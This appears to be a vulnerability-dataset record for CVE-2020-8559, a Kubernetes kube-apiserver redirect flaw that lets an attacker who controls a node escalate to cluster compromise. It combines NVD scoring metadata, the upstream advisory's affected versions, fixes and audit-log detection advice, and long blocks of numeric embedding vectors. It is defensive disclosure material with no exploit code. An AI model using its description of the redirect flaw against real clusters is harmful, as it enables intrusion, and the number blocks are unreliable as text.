0.005530010908842087, -0.012368040159344673, 0.0017712748376652598, 0.013574323616921902, 0.010936486534774303, -0.023776866495609283, -0.022134575992822647, 0.0034299148246645927, -0.006743561010807753, 0.0009637551847845316, -0.009323264472186565, 0.01765824668109417, -0.002770455554127693, 0.022715918719768524, -0.013487122021615505, -0.0018966265488415956, 0.004316460341215134, 0.002352616284042597, 0.004483595956116915, 0.0033009296748787165, 0.00986827164888382, -0.017585579305887222, -0.0110018877312541, -0.025753427296876907, -0.003956755623221397, 0.021974708884954453, -0.005035870708525181, -0.014191999100148678, 0.015667153522372246, -0.02982281893491745, 0.0025124852545559406, 0.020332418382167816, 0.000060859187215100974, 0.008974459022283554, 0.010282477363944054, -0.021088162437081337, -0.00654372526332736, -0.025738894939422607, -0.004730666521936655, 0.005584511440247297, 0.010791150853037834, -0.011546894907951355, -0.011067287996411324, -0.016786234453320503, 0.00868378859013319, 0.011016421020030975, -0.01819598861038685, -0.004654365126043558, -0.0033717805054038763, -0.0010745733743533492, -0.01839945837855339, 0.014431802555918694, 0.003302746219560504, 0.019576674327254295, 0.01659729890525341, -0.037787195295095444, 0.002741388510912657, 0.006478324066847563, -0.0019947278779000044, 0.01414839830249548, 0.011517828330397606, 0.006347522139549255, -0.010020873509347439, 0.009650268591940403, 0.007226801477372646, -0.0012707761488854885, -0.0026505538262426853, 0.014853274449706078, 0.007484771776944399, -0.016175827011466026, 0.002559719141572714, 0.0005300199263729155, -0.0002604682231321931, 0.015986891463398933, 0.016684500500559807, 0.00919246207922697, -0.02386406809091568, -0.011125423014163971, -0.010820218361914158, -0.008116980083286762, 0.015085811726748943, -0.006525557953864336, -0.007615573238581419, -0.028093326836824417, -0.003949488513171673, 0.015143945813179016, 0.024009402841329575, 0.028689201921224594, 0.017585579305887222, -0.009759270586073399, -0.029750149697065353, -0.01789078488945961, -0.007125066593289375, 0.01167769730091095, -0.018210522830486298, 0.004661632236093283, 0.003422647947445512, 0.003840487217530608, -0.0005777081241831183, 0.005929683335125446, -0.02493955008685589, 0.005740747321397066, 0.02492501586675644, 0.012636910192668438, -0.007891710847616196, -0.002138246549293399, 0.023660598322749138, 0.008400384336709976, -0.002247248077765107, -0.017454778775572777, 0.04043230041861534, 0.006383856292814016, -0.022265378385782242, 0.005827948451042175, -0.023718733340501785, 0.0017494745552539825, -0.014620738103985786, -0.0027777221985161304, -0.00024616176960989833, 0.010558614507317543, -0.000041471674194326624, 0.005595411639660597, 0.0032954795751720667, 0.012397106736898422, -0.003924055024981499, -0.012738645076751709, 0.011052754707634449, 0.019896412268280983, -0.0015251130098477006, 0.013923128135502338, 0.028863605111837387, -0.008247782476246357, 0.0029702915344387293, 0.010035407729446888, 0.017730915918946266, 0.013174651190638542, -0.011612296104431152, -0.0070305983535945415, 0.011706763878464699, 0.0012635093880817294, -0.0007966195116750896, -0.006347522139549255, 0.01896626502275467, 0.027105046436190605, 0.007404837291687727, 0.013000248931348324, 0.00042964768363162875, -0.007441170979291201, -0.013857727870345116, -0.000015910249203443527, -0.003402664326131344, -0.013210984878242016, -0.006816228851675987, 0.0034480816684663296, 0.021843906491994858, -0.00680896220728755, 0.0036261174827814102, 0.02486688271164894, 0.009410465136170387, -0.009236062876880169, -0.010980087332427502, -0.014628005214035511, -0.011270757764577866, 0.00931599736213684, 0.010936486534774303, 0.011815765872597694, 0.007949844934046268, -0.0004643919237423688, -0.008276849053800106, 0.015071277506649494, 0.002808606019243598, -0.016292095184326172, 0.018355857580900192, -0.014489936642348766, -0.007840842939913273, 0.0050322371535003185, 0.006351155694574118, -0.009897339157760143, -0.005740747321397066, -0.0019093434093520045, -0.0049704695120453835, -0.00035266534541733563, -0.020027214661240578, -0.0015977807343006134, -0.009512200020253658, 0.006176753435283899, 0.0012308089062571526, -0.0012262671953067183, 0.005548177752643824, 0.0058097816072404385, -0.0181669220328331, 0.006976097822189331, 0.00895992573350668, -0.00016316166147589684, 0.0016622733091935515, -0.012804046273231506, -0.015521817840635777, 0.002579702762886882, -0.024750612676143646, 0.018806396052241325, -0.011183557100594044, -0.020056281238794327, -0.010921953245997429, 0.003931321669369936, 0.01713504083454609, -0.008800056762993336, 0.0029194243252277374, -0.031247105449438095, 0.026392903178930283, 0.014082997106015682, 0.007935311645269394, 0.004839668050408363, 0.003270045854151249, -0.011510561220347881, 0.0025361021980643272, 0.01789078488945961, 0.005464609712362289, -0.008247782476246357, 0.004054856952279806, 0.0047851670533418655, 0.0007080557406879961, -0.02252698317170143, -0.0056680794805288315, -0.010137141682207584, 0.0021636802703142166, -0.003529832698404789, 0.013719659298658371, 0.008930858224630356, -0.003960388712584972, 0.013530722819268703, 0.009301464073359966, -0.021146295592188835, -0.023398995399475098, 0.0031210770830512047, -0.015231146477162838, 0.010166209191083908, 0.005479143466800451, -0.006111352238804102, -0.00421472592279315, 0.001745841116644442, -0.016786234453320503, 0.004465429112315178, 0.005857015494257212, 0.0016368395881727338, -0.0011009154841303825, 0.02434367500245571, 0.02879093773663044, 0.013312719762325287, 0.000491415208671242, -0.004901435226202011, -0.002941224491223693, 0.000207670615054667, -0.01970747672021389, -0.005402842536568642, -0.013131050392985344, 0.012833112850785255, -0.015042210929095745, 0.008022512309253216, 0.0047597335651516914, -0.007753641810268164, -0.012651444412767887, 0.02934321202337742, -0.007397570181638002, 0.015114878304302692, -0.004694332368671894, 0.008625654503703117, -0.008000711910426617, -0.009039860218763351, -0.010812951251864433, -0.005155772436410189, -0.0007371228421106935, -0.0032409788109362125, 0.015361948870122433, -0.0031319772824645042, 0.019140668213367462, 0.013421721756458282, -0.013610657304525375, 0.002636020304635167, 0.017759982496500015, 0.006024151109158993, -0.006877996493130922, 0.005758914165198803, 0.00896719191223383, -0.007310369051992893, 0.025361021980643272, -0.003142877481877804, 0.01090015284717083, 0.009432265534996986, 0.006085918750613928, 0.0009891889058053493, -0.0013734193053096533, -0.0032409788109362125, -0.004400028381496668, -0.00961393490433693, -0.011067287996411324, -0.0073176356963813305, 0.03429914638400078, 0.0038622873835265636, 0.003993089310824871, 0.0068198624067008495, 0.014489936642348766, 0.020361484959721565, 0.005995084065943956, 0.004955936223268509, -0.019329603761434555, 0.014090264216065407, 0.006638193037360907, -0.02438727580010891, -0.002556085819378495, 0.0014079364482313395, 0.016989704221487045, -0.012854913249611855, 0.011161756701767445, -0.005548177752643824, -0.005606311839073896, -0.018748262897133827, 0.00158597226254642, 0.004661632236093283, 0.023660598322749138, 0.015449149534106255, 0.008523919619619846, 0.010820218361914158, -0.009781070053577423, 0.0031737610697746277, 0.02050682157278061, -0.00019359125872142613, -0.0038223201408982277, -0.01467887219041586, -0.02153870277106762, -0.020870158448815346, -0.006173119880259037, 0.006736294366419315, 0.02178577147424221, -0.012913047336041927, -0.003117443760856986, 0.0002815872721839696, -0.005086738150566816, -0.006391122937202454, -0.009541267529129982, 0.0048651015385985374, 0.012920314446091652, -0.025724360719323158, -0.007404837291687727, 0.0012389840558171272, 0.012346239760518074, 0.01090015284717083, -0.0011426993878558278, -0.006372956093400717, -0.010849284939467907, -0.030665762722492218, 0.020695757120847702, -0.0027595553547143936, 0.004777900408953428, 0.002274498576298356, 0.0015160295879468322, -0.017222240567207336, -0.0014969543553888798, -0.008073380216956139, -0.00564264552667737, -0.005184839479625225, 0.0014578953851014376, 0.030200690031051636, -0.000558632833417505, 0.002100096084177494, 0.011198090389370918, 0.021436966955661774, -0.005152138881385326, -0.009483132511377335, -0.007201367523521185, 0.0012362590059638023, 0.005097638349980116, -0.025753427296876907, -0.01915520243346691, 0.00033858598908409476, -0.008516652509570122, -0.008131514303386211, -0.008131514303386211, -0.012600576505064964, 0.008109713904559612, 0.005384675692766905, 0.025331955403089523, -0.004530830308794975, -0.0019275103695690632, -0.0022363481111824512, -0.0027432050555944443, 0.0103769451379776, 0.0026796208694577217, -0.022381646558642387, 0.002521568676456809, -0.007513838820159435, -0.007386669982224703, -0.0013452605344355106, 0.013428987935185432, -0.02416927181184292, 0.004138424526900053, 0.0097156697884202, 0.012774978764355183, -0.020884692668914795, 0.005649912636727095, 0.02411113865673542, -0.014533537440001965, 0.0233117938041687, -0.008276849053800106, 0.00214006332680583, -0.011873899959027767, -0.014519003219902515, 0.006445623468607664, 0.0021037294063717127, 0.00025706193991936743, 0.029633881524205208, 0.003913154825568199, 0.001920243608765304, -0.022497914731502533, -0.003457165090367198, 0.02800612524151802, -0.0037423858884721994, -0.01841399073600769, -0.009323264472186565, -0.03089829906821251, -0.013843193650245667, -0.004992269910871983, -0.014511737041175365, -0.015928756445646286, -0.004552630707621574, -0.0032355287112295628, 0.015638085082173347, -0.021204430609941483, -0.01608862541615963, 0.010609482415020466, 0.024212872609496117, 0.0032954795751720667, -0.013661525212228298, 0.0069651976227760315, 0.009599401615560055, -0.015129412524402142, 0.04961749538779259, 0.011764897964894772, -0.0005341075011529028, 0.009824670851230621, 0.002005628077313304, 0.0034698820672929287, -0.005686246324330568, -0.00871285516768694, 0.013029315508902073, 0.0008956292294897139, 0.00550094386562705, 0.001424286630935967, -0.004298293497413397, -0.00883639045059681, -0.014744273386895657, -0.00680896220728755, 0.006147686392068863, -0.0022835819981992245, -0.010951019823551178, -0.023747799918055534, -0.01022434327751398, -0.0022617815993726254, 0.015725286677479744, -0.016728101298213005, -0.011248957365751266, 0.006194920279085636, -0.0007430270779877901, -0.012644177302718163, -0.0008043404668569565, 0.013465321622788906, 0.0071068997494876385, -0.020913759246468544, -0.01946040615439415, -0.006729027722030878, 0.002995725255459547, 0.008567520417273045, 0.007986178621649742, 0.01869012787938118, -0.022250846028327942, -0.009424998424947262, 0.003666084725409746, -0.0005695329746231437, -0.00933779776096344, 0.004763366654515266, -0.020099882036447525, 0.012571509927511215, -0.014308267273008823, 0.028921738266944885, 0.040868304669857025, 0.02230897918343544, 0.008473051711916924, 0.00869105476886034, -0.008342250250279903, 0.012978448532521725, 0.0051775723695755005, -0.01841399073600769, 0.013131050392985344, -0.01760011352598667, -0.028325863182544708, -0.024256473407149315, 0.006013250909745693, 0.002534285420551896, -0.021131763234734535, -0.01585608907043934, -0.015260213986039162, -0.002125529805198312, 0.005130338482558727, 0.005624478682875633, 0.005860648583620787, 0.032584190368652344, -0.011212623678147793, -0.009454065933823586, -0.0014597121626138687, -0.007993445731699467, -0.015754353255033493, -0.03691518306732178, 0.003589783562347293, -0.008022512309253216, 0.003956755623221397, -0.007797242607921362, -0.011045488528907299, -0.0048251342959702015, 0.00021402904530987144, 0.00030020836857147515, 0.017309442162513733, -0.012237237766385078, 0.0022908488754183054, -0.0017194991232827306, 0.0031610443256795406, -0.009047126397490501, 0.0246634129434824, 0.007034231908619404, -0.02803519368171692, -0.01684436947107315, 0.01578342169523239, -0.004981369711458683, 0.005406475625932217, -0.000785719370469451, 0.00010758223652374, 0.015638085082173347, 0.012658710591495037, 0.009773803874850273, -0.01916973479092121, -0.0030683930963277817, 0.004182025324553251, -0.00030338758369907737, 0.016466498374938965, -0.006300288252532482, -0.020041747018694878, 0.005224806722253561, 0.004948669578880072, -0.0017394827445968986, -0.005936949979513884, -0.01012260839343071, 0.0033354468178004026, 0.008349517360329628, 0.007492038421332836, -0.012288105674088001, 0.013196451589465141, 0.020666690543293953, -0.014286466874182224, -0.016408363357186317, 0.012636910192668438, -0.00008810956933302805, -0.016190359368920326, -0.005929683335125446, -0.005740747321397066, 0.016161292791366577, 0.023021122440695763, -0.0207974910736084, 0.022120043635368347, -0.00896719191223383, 0.008988992311060429, 0.006729027722030878, 0.021335233002901077, 0.01100915390998125, -0.0027268549893051386, 0.019780144095420837, 0.003927688580006361, 0.021654970943927765, 0.004530830308794975, 0.04360061138868332, 0.007986178621649742, 0.007826309651136398, -0.018893597647547722, 0.018210522830486298, 0.01103095430880785, -0.006500124465674162, -0.0003576612507458776, 0.007659174036234617, 0.0015332881594076753, 0.012905781157314777, 0.01012260839343071, -0.0016604566480964422, 0.0032609624322503805, 0.018879065290093422, 0.014969543553888798, 0.024314606562256813, -0.034909557551145554, -0.005152138881385326, -0.003934955224394798, 0.02775905653834343, 0.0034008477814495564, -0.004876001738011837, -0.0065764253959059715, 0.003989455755800009, 0.005929683335125446, -0.0015378298703581095, 0.03711865469813347, -0.001835767412558198, -0.0246198121458292, -0.009759270586073399, 0.016001423820853233, -0.013109249994158745, 0.020332418382167816, 0.012571509927511215, 0.01656823232769966, 0.006670893635600805, 0.035926904529333115, 0.000970113615039736, 0.0037750862538814545, 0.02409660443663597, -0.00921426247805357, -0.01129982527345419, 0.026509171351790428, -0.018617460504174232, 0.0013498022453859448, -0.014548070728778839, 0.017977984622120857, 0.01502767764031887, 0.016800768673419952, -0.01103095430880785, 0.013305453583598137, 0.012811312451958656, -0.010108075104653835, 0.03165404498577118, -0.007401203736662865, 0.003397214226424694, 0.006169486325234175, -0.010427813045680523, 0.012360773049294949, -0.01130709145218134, 0.005108538083732128, 0.01334905344992876 ]
2,271
CVE-2020-8559
2020-07-22T14:15:16.517000
The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.5, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92914" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/JAIGG5yNROs/19nHQ5wkBwAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200810-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "43222A9D-6D48-490F-8120-349DCE1C1218", "versionEndExcluding": null, "versionEndIncluding": "1.15.0", "versionStartExcluding": null, "versionStartIncluding": "1.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE1EA8C5-2EF4-4462-B693-FE20B3DF75C6", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/92914
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver
CVE-2020-8559: Privilege escalation from compromised node to cluster
https://api.github.com/repos/kubernetes/kubernetes/issues/92914/comments
7
2020-07-08T17:03:16
2021-12-02T22:54:32Z
https://github.com/kubernetes/kubernetes/issues/92914
653,456,402
92,914
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8559: Privilege escalation from compromised node to cluster Issue date: --- start body --- CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver --- end body ---
2,799
[ -0.022712280973792076, -0.027046170085668564, -0.00010369165829615667, -0.012588590383529663, 0.03979050740599632, -0.035835836082696915, 0.005969253368675709, 0.033452197909355164, 0.003001556033268571, 0.018703434616327286, -0.019949428737163544, -0.022089285776019096, -0.021791329607367516, 0.006378941237926483, 0.003111596219241619, 0.07405531406402588, -0.013495998457074165, -0.025705372914671898, 0.011715040542185307, 0.0229966938495636, -0.015168608166277409, -0.021236050873994827, -0.03136651590466499, 0.05655723810195923, -0.0004448160470928997, 0.010401330888271332, -0.004235698375850916, 0.023944731801748276, -0.0509231835603714, 0.009385576471686363, 0.013854898512363434, 0.017538702115416527, -0.001450836774893105, 0.012900087982416153, 0.03911333903670311, -0.004516724031418562, 0.018459653481841087, 0.03299172222614288, -0.03456275537610054, -0.03356054425239563, -0.04157823696732521, -0.06392484903335571, 0.018689891323447227, 0.003109903307631612, -0.004763890989124775, 0.010922752320766449, 0.006720912177115679, -0.040901068598032, -0.0020196596160531044, 0.03169155493378639, -0.01272402424365282, -0.03488779813051224, -0.03756939247250557, -0.05563628673553467, 0.01752515882253647, -0.0052379099652171135, 0.02368740737438202, 0.009581955149769783, 0.009839280508458614, -0.009934083558619022, 0.014897739514708519, 0.03155612200498581, 0.011444172821938992, 0.028197359293699265, 0.010543536394834518, 0.029903827235102654, -0.02112770453095436, -0.004499794449657202, -0.029903827235102654, 0.0009378804243169725, -0.003971601836383343, 0.003937743604183197, 0.01621145009994507, -0.020694315433502197, 0.04729355126619339, -0.016252079978585243, 0.028793267905712128, 0.04044059291481972, -0.038598690181970596, -0.01619790680706501, -0.03380432724952698, 0.04182201996445656, -0.023660318925976753, 0.010963382199406624, 0.04472030699253082, -0.0376235656440258, -0.02322693169116974, -0.07405531406402588, -0.002182180294767022, -0.01805335283279419, -0.018730521202087402, 0.004523495677858591, -0.02490631304681301, -0.03277502954006195, 0.023091496899724007, -0.004167981445789337, -0.016996966674923897, -0.029497524723410606, -0.059753481298685074, 0.0028017908334732056, -0.03326259180903435, -0.0007952515152283013, -0.008010921068489552, 0.020152579993009567, 0.0657125785946846, 0.0036025443114340305, 0.013624660670757294, 0.01644168794155121, -0.024960486218333244, 0.12438258528709412, 0.03927585855126381, -0.007320207543671131, -0.03342511132359505, -0.0024344262201339006, -0.024093708023428917, 0.01882532611489296, -0.006747999228537083, -0.020003601908683777, -0.04683307558298111, -0.02631482668220997, -0.013509541749954224, -0.02058596722781658, 0.016238536685705185, -0.017308464273810387, -0.029578786343336105, -0.0007478496409021318, 0.0031877777073532343, 0.023728037253022194, -0.02198093757033348, -0.0042966436594724655, 0.00040524391806684434, 0.01744389906525612, -0.029280830174684525, -0.00215001474134624, 0.018107526004314423, 0.03331676498055458, 0.0010851649567484856, 0.03954672813415527, -0.01920454017817974, -0.006226578261703253, -0.008105725049972534, -0.03540244698524475, 0.0051058619283139706, 0.02498757280409336, 0.011633780784904957, 0.009053763002157211, 0.017714766785502434, -0.0025089147966355085, -0.02922665700316429, 0.005718700587749481, 0.003001556033268571, -0.0007749364012852311, 0.029876740649342537, 0.020694315433502197, 0.06674187630414963, -0.017376182600855827, -0.0016616059001535177, 0.012331265956163406, -0.0075165871530771255, 0.006676896009594202, 0.0167531855404377, -0.03215203061699867, -0.009351717308163643, -0.009818964637815952, 0.02483859471976757, 0.017145944759249687, 0.0019316273974254727, -0.01752515882253647, -0.03670261427760124, 0.03155612200498581, 0.010658655315637589, -0.034210629761219025, 0.018527371808886528, -0.008275017142295837, -0.040901068598032, 0.00036207432276569307, 0.01990879699587822, 0.0217642430216074, 0.022576848044991493, -0.012696937657892704, -0.01056385226547718, 0.02105998620390892, -0.043230533599853516, 0.01180984452366829, 0.043934788554906845, -0.035077404230833054, -0.008809981867671013, 0.03171864151954651, 0.0017039290396496654, -0.01921808533370495, -0.002625726629048586, -0.0028204130940139294, 0.028657834976911545, -0.020450534299016, -0.046941425651311874, 0.020477620884776115, -0.01113944686949253, -0.026815932244062424, 0.07443452626466751, -0.026355456560850143, 0.011897876858711243, 0.005904922261834145, -0.03377724066376686, 0.0032148645259439945, -0.025271983817219734, 0.019312888383865356, 0.001965485978871584, -0.010286211967468262, -0.0031826989725232124, -0.02089746668934822, -0.04959592968225479, -0.045559998601675034, 0.02307795360684395, -0.01627916656434536, 0.045018263161182404, 0.0040494767017662525, -0.00545799033716321, 0.011999452486634254, -0.03919459879398346, 0.025515764951705933, 0.03743395581841469, -0.010347157716751099, 0.014220570214092731, 0.007740052882581949, -0.03943838179111481, 0.00140258832834661, 0.023105040192604065, -0.03561914339661598, 0.014532067812979221, -0.029795479029417038, -0.006974850781261921, -0.025285527110099792, 0.008335962891578674, 0.01238543912768364, -0.004269556608051062, -0.018635718151926994, 0.005915079731494188, -0.009385576471686363, 0.0067886291071772575, 0.009493923746049404, 0.016170820221304893, -0.005193893797695637, -0.023728037253022194, -0.01935351826250553, -0.011186848394572735, 0.03919459879398346, -0.03905916586518288, 0.055582113564014435, -0.023267561569809914, 0.026260651648044586, -0.0376235656440258, 0.030906038358807564, -0.0032775027211755514, 0.0018994618440046906, 0.017701223492622375, -0.03616087883710861, -0.030824778601527214, 0.023728037253022194, 0.005664526950567961, -0.0165094044059515, 0.03635048493742943, 0.00744209811091423, -0.012250005267560482, 0.02536678873002529, 0.019570212811231613, -0.029118310660123825, -0.014857109636068344, 0.01260890532284975, 0.005190507974475622, -0.04428691789507866, 0.027791056782007217, -0.015778061002492905, -0.02158818021416664, -0.03117690607905388, -0.007489500101655722, -0.015141521580517292, 0.027736883610486984, 0.01797209121286869, -0.011403542943298817, -0.01680735871195793, 0.027818143367767334, -0.028034837916493416, -0.00964290089905262, 0.01044873334467411, -0.012744339182972908, 0.016726098954677582, -0.006026812829077244, -0.0662001371383667, -0.004533653147518635, 0.010665427893400192, -0.02984965406358242, -0.003226715140044689, 0.011200391687452793, -0.006409414112567902, 0.010049202479422092, 0.027100343257188797, -0.02353842929005623, 0.04742898792028427, -0.0015769596211612225, -0.009697074070572853, -0.008268245495855808, 0.013015206903219223, 0.002684979001060128, 0.04425983130931854, -0.004868852440267801, 0.023240474984049797, -0.003693962236866355, 0.035077404230833054, -0.02236015349626541, 0.012202603742480278, 0.01673964224755764, -0.022509131580591202, 0.0075165871530771255, -0.022333066910505295, 0.0053530288860201836, 0.01400387566536665, 0.020924553275108337, -0.04157823696732521, -0.013644975610077381, 0.008776122704148293, 0.024093708023428917, 0.004496408626437187, -0.026192935183644295, 0.02114124782383442, 0.02189967781305313, -0.03672970086336136, -0.008241158910095692, 0.0026104904245585203, -0.07015480846166611, -0.012338037602603436, -0.01688862033188343, 0.0021838732063770294, -0.03480653837323189, -0.02391764335334301, -0.03442732244729996, -0.026098132133483887, -0.041307371109724045, 0.010618025436997414, 0.03364180400967598, 0.018297133967280388, -0.001361111644655466, -0.029985086992383003, 0.003368920646607876, 0.01805335283279419, 0.007076426409184933, -0.02475733496248722, -0.0061453175731003284, -0.018608631566166878, 0.042174145579338074, -0.029714219272136688, 0.0007740899454802275, 0.018852412700653076, -0.004479479510337114, 0.0014948527095839381, 0.040738545358181, -0.007299892604351044, -0.016306253150105476, -0.019854623824357986, 0.025434505194425583, -0.04195745289325714, 0.057207319885492325, -0.046399686485528946, -0.0003197512123733759, 0.023321734741330147, -0.013407966122031212, -0.022847715765237808, -0.019096193835139275, 0.012256776914000511, -0.02909122221171856, 0.00047782808542251587, -0.045478735119104385, -0.005779645871371031, 0.03017469495534897, 0.027587905526161194, -0.011965594254434109, -0.02598978392779827, -0.02984965406358242, 0.02097872644662857, -0.029199570417404175, 0.03152903541922569, -0.014220570214092731, -0.002530922880396247, 0.008762579411268234, -0.00941266305744648, 0.023728037253022194, 0.03897790610790253, 0.0382736474275589, 0.024472923949360847, 0.002111077541485429, 0.009026676416397095, -0.04667055606842041, 0.06787952035665512, -0.015520736575126648, -0.023714493960142136, -0.027113886550068855, -0.006995166186243296, -0.013746551238000393, -0.013326705433428288, 0.03635048493742943, -0.008105725049972534, 0.015940582379698753, 0.027587905526161194, 0.0007563142571598291, 0.03161029517650604, -0.0003045148914679885, 0.007435326464474201, -0.012994891963899136, -0.030499735847115517, 0.0005497774109244347, -0.03442732244729996, -0.004418534226715565, -0.007699423003941774, -0.043772269040346146, 0.012432841584086418, 0.022333066910505295, 0.09567057341337204, 0.05829079449176788, 0.020274469628930092, 0.011125902645289898, 0.04133445769548416, 0.01944832317531109, -0.005430903285741806, 0.04190327972173691, 0.01644168794155121, 0.002385331317782402, 0.02900996245443821, 0.019868167117238045, 0.04621008038520813, 0.047022685408592224, -0.007083198055624962, 